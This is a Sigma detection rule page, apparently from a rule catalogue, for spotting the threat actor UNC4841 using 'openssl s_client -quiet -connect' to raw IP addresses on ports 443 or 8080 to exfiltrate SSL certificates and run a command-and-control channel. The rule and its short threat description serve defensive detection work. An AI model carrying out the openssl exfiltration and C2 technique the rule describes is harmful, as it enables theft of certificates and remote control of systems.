UNC4841 - SSL Certificate Exfiltration Via Openssl
Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
Sigma rule (View on GitHub)
1title: UNC4841 - SSL Certificate Exfiltration Via Openssl
2id: 60911c07-f989-4362-84af-c609828ef829
3status: test
4description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
5references:
6 - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023-06-16
9tags:
10 - attack.defense-evasion
11 - attack.t1140
12 - detection.emerging-threats
13logsource:
14 product: linux
15 category: process_creation
16detection:
17 selection:
18 Image|endswith: '/openssl'
19 CommandLine|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
20 CommandLine|contains|all:
21 - 's_client'
22 - '-quiet'
23 - '-connect'
24 CommandLine|contains:
25 - ':443'
26 - ':8080'
27 condition: selection
28falsepositives:
29 - Unknown
30level: high
References
-
SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabil...
Read More
Related rules
- Potential BlackByte Ransomware Activity
- UNC4841 - Download Compressed Files From Temp.sh Using Wget
- UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
- APT PRIVATELOG Image Load Pattern
- APT27 - Emissary Panda Activity